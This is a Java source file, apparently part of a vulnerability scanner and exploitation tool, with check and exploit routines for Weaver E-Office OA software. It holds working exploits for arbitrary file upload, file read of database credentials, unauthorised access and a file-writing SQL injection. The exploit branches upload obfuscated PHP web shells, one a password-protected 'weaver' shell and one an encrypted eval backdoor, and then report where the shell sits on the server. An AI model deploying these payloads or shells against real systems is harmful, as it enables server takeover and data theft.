package com.achuna33.Controllers;

import com.achuna33.SupportType.Poc_Exp;
import com.achuna33.SupportType.SupportVul;
import com.achuna33.Utils.Cache;
import com.achuna33.Utils.HttpRequest;
import com.achuna33.Utils.Response;
import com.achuna33.Utils.Utils;
import sun.security.krb5.internal.crypto.Des;

import java.net.MalformedURLException;

@BasicMapping(uri ="泛微OA E-Office")
public class WeaverEOfficeController  extends Controller implements BasicController{
    @VulnerabilityDescriptionMapping(Description="泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104" ,SupportVulType= SupportVul.UploadFile)
    public void vul_UploadFile(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office UploadFile.php 任意文件上传漏洞 CNVD-2021-49104");
        String url = "/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId=";
        String data = "--e64bdf16c554bbc109cecef6451c26a4\r\n" +
                "Content-Disposition: form-data; name=\"Filedata\"; filename=\"test.php\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n" +
                "shellcode\r\n" +
                "\r\n" +
                "--e64bdf16c554bbc109cecef6451c26a4--\r\n";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String payload = "<?php \n" +
                        "class YXBX { \n" +
                        "    function oSpp() {\n" +
                        "        $aXNZ = \"\\xc3\" ^ \"\\xa2\";\n" +
                        "        $yjrX = \"\\xc4\" ^ \"\\xb7\";\n" +
                        "        $rIEv = \"\\x65\" ^ \"\\x16\";\n" +
                        "        $LBCL = \"\\xb0\" ^ \"\\xd5\";\n" +
                        "        $PUlT = \"\\x5a\" ^ \"\\x28\";\n" +
                        "        $abCJ = \"\\x7\" ^ \"\\x73\";\n" +
                        "        $YQCe =$aXNZ.$yjrX.$rIEv.$LBCL.$PUlT.$abCJ;\n" +
                        "        return $YQCe;\n" +
                        "    }\n" +
                        "    function __destruct(){\n" +
                        "        $jfLL=$this->oSpp();\n" +
                        "        @$jfLL($this->dm);\n" +
                        "    }\n" +
                        "}\n" +
                        "$yxbx = new YXBX();\n" +
                        "@$yxbx->dm = isset($_GET['id'])?base64_decode($_POST['weaver']):$_POST['weaver'];\n" +
                        "?>\n";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 密码为: weaver");
                }
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4");
                data = data.replace("shellcode",payload);

                httpRequest3.Post(data);

                Response result1 = new HttpRequest(target +"/images/logo/logo-eoffice.php").Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/images/logo/logo-eoffice.php");
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/images/logo/logo-eoffice.php");
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");
                }
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                data = data.replace("shellcode","<?php phpinfo();?>");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4");
                httpRequest.Post(data);
                Response result = new HttpRequest(target+"/images/logo/logo-eoffice.php").Get("");

                if(result.statusCode==200 && result.responseBody.toLowerCase().contains("phpinfo")){
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+url );
                }else {
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office officeserver.php 任意文件读取漏洞" ,SupportVulType = SupportVul.信息泄露)
    public void vul_officeserver信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office officeserver.php 任意文件读取漏洞");

        String url = "/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 && result.responseBody.contains("password")){
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+"/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini" );
                }else {
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office UserSelect 未授权访问漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_UserSelect信息泄露(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office UserSelect 未授权访问漏洞");

        String url = "/UserSelect/";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 ){
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+"/UserSelect/" );
                }else {
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_mysql_config(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞");

        String url = "/mysql_config.ini";
        switch (type){
            case EXP:
                break;
            case POC:
                HttpRequest httpRequest = new HttpRequest(target+url);
                String data = "";
                Response result = httpRequest.Get(data);
                if(result.statusCode==200 && result.responseBody.contains("password")){
                    WriteLog("\n 存在漏洞");
                    WriteLog("\n 访问地址："+target+url );
                }else {
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

    @VulnerabilityDescriptionMapping(Description = "泛微OA E-Office group_xml.php SQL注入漏洞",SupportVulType = SupportVul.信息泄露)
    public void vul_group_xml(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微OA E-Office group_xml.php SQL注入漏洞");

        String url = "/inc/group_user_list/group_xml.php?par=W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L3Z1bG50ZXN0LnBocCdd";
        switch (type){
            case EXP:
                break;
            case POC:
                String data = "";
                new HttpRequest(target+url).Get(data);
                Response result2 = new HttpRequest(target+"/vulntest.php").Get("");
                if(result2.statusCode==200 && result2.responseBody.toLowerCase().contains("phpinfo")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );
                    WriteLog("\n[*] 写入地址："+target+"/vulntest.php" );
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
    @VulnerabilityDescriptionMapping(Description = "泛微 eoffice10 前台 getshell（eoffice10/version.json）",SupportVulType = SupportVul.信息泄露)
    public void vul_version_json(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        WriteLog("\n[*]开始检测：  泛微 eoffice10 前台 getshell（eoffice10/version.json）");

        String url = "/eoffice10/version.json" ;
        switch (type){
            case EXP:
                break;
            case POC:
                Response result2 = new HttpRequest(target+url).Get("");
                if(result2.statusCode==200 && result2.responseBody.toLowerCase().contains("OfficeServer.php")){
                    WriteLog("\n[*] 存在漏洞");
                    WriteLog("\n[*] 访问地址："+target+url );
                }else {
                    WriteLog("\n[*] 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }
      @VulnerabilityDescriptionMapping(Description="泛微OA E-Office10 OfficeServer.php 任意文件上传漏洞 " ,SupportVulType= SupportVul.UploadFile)
    public void vul_UploadFile2(Poc_Exp type, String target, Object... args) throws MalformedURLException {
        Cache.uiController.logTextArea.appendText("\n[*]开始检测：  泛微OA E-Office10 OfficeServer.php 任意文件上传漏洞");
        String url = "/eoffice10/server/public/iWebOffice2015/OfficeServer.php";
        String data = "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs\r\n" +
                "Content-Disposition: form-data; name=\"FileData\"; filename=\"1.jpg\"\r\n" +
                "Content-Type: image/jpeg\r\n" +
                "\r\n" +
                "shellcode\r\n" +
                "\r\n" +
                "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs\r\n"+
                "Content-Disposition: form-data; name=\"FormData\"\r\n"+
                "\r\n"+
                "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'config_application.php'}\r\n"+
                "------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--";
        switch (type){
            case EXP:
                String path = null;
                String mypayload = null;
                try {
                    path = (String) args[0];
                    try {
                        byte[] bytes = Utils.readFile(path);
                        mypayload = new String(bytes);
                    }catch (Exception e){
                        WriteExpLog("\n [*] 文件读取失败");
                    }
                }catch (Exception e){

                }
                String payload = "<?php\n" +
                        "@session_start();\n" +
                        "@set_time_limit(0);\n" +
                        "@error_reporting(0);\n" +
                        "function encode($D,$K){\n" +
                        "    for($i=0;$i<strlen($D);$i++) {\n" +
                        "        $c = $K[$i+1&15];\n" +
                        "        $D[$i] = $D[$i]^$c;\n" +
                        "    }\n" +
                        "    return $D;\n" +
                        "}\n" +
                        "$payloadName='payload';\n" +
                        "$key='3c6e0b8a9c15224a';\n" +
                        "$data=file_get_contents(\"php://input\");\n" +
                        "if ($data!==false){\n" +
                        "    $data=encode($data,$key);\n" +
                        "    if (isset($_SESSION[$payloadName])){\n" +
                        "        $payload=encode($_SESSION[$payloadName],$key);\n" +
                        "        if (strpos($payload,\"getBasicsInfo\")===false){\n" +
                        "            $payload=encode($payload,$key);\n" +
                        "        }\n" +
                        "\t\teval($payload);\n" +
                        "        echo encode(@run($data),$key);\n" +
                        "    }else{\n" +
                        "        if (strpos($data,\"getBasicsInfo\")!==false){\n" +
                        "            $_SESSION[$payloadName]=encode($data,$key);\n" +
                        "        }\n" +
                        "    }\n" +
                        "}\n";

                if (mypayload!=null){
                    payload = mypayload;
                }else {
                    WriteExpLog("\n [*] 默认shell 密码为: weaver");
                }
                String shellpath2 = Utils.getRandomString(4)+".php";
                HttpRequest httpRequest3 = new HttpRequest(target+url);
                httpRequest3.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs");
                httpRequest3.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36");
                httpRequest3.addHeaders("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                httpRequest3.addHeaders("Accept-Encoding"," gzip, deflate");
                data = data.replace("shellcode",payload);
                data = data.replace("config_application.php",shellpath2);
                httpRequest3.Post(data);

                Response result1 = new HttpRequest(target +"/eoffice10/server/public/iWebOffice2015/Document/"+shellpath2).Get("");
                if(result1.statusCode==200){
                    WriteExpLog("\n[*] shell path:\n"+target +"/eoffice10/server/public/iWebOffice2015/Document/"+shellpath2);
                }else {
                    WriteExpLog("\n 访问失败:\n"+target +"/eoffice10/server/public/iWebOffice2015/Document/"+shellpath2);
                    WriteExpLog("\n 请验证POC 可靠性 或 EXP免杀性");
                }
                break;
            case POC:
                String shellpath = Utils.getRandomString(4)+".php";
                HttpRequest httpRequest = new HttpRequest(target+url);
                data = data.replace("shellcode","<?php echo md5(1);?>");
                httpRequest.addHeaders("Content-Type","multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs");
                httpRequest.addHeaders("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36");
                httpRequest.addHeaders("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9");
                httpRequest.addHeaders("Accept-Encoding"," gzip, deflate");
                data = data.replace("config_application.php",shellpath);
                httpRequest.Post(data);
                Response result = new HttpRequest(target+"/eoffice10/server/public/iWebOffice2015/Document/"+shellpath).Get("");

                if(result.statusCode==200 && result.responseBody.toLowerCase().contains("c4ca4238a0b923820dcc509a6f75849b")){
                    WriteLog("\n 存在漏洞");
//                    WriteLog("\n 访问地址："+target+url );
                }else {
                    WriteLog(result.responseBody);
                    WriteLog("\n 不存在漏洞");
                }
                //WriteLog("\n"+result.responseBody);
        }
    }

}
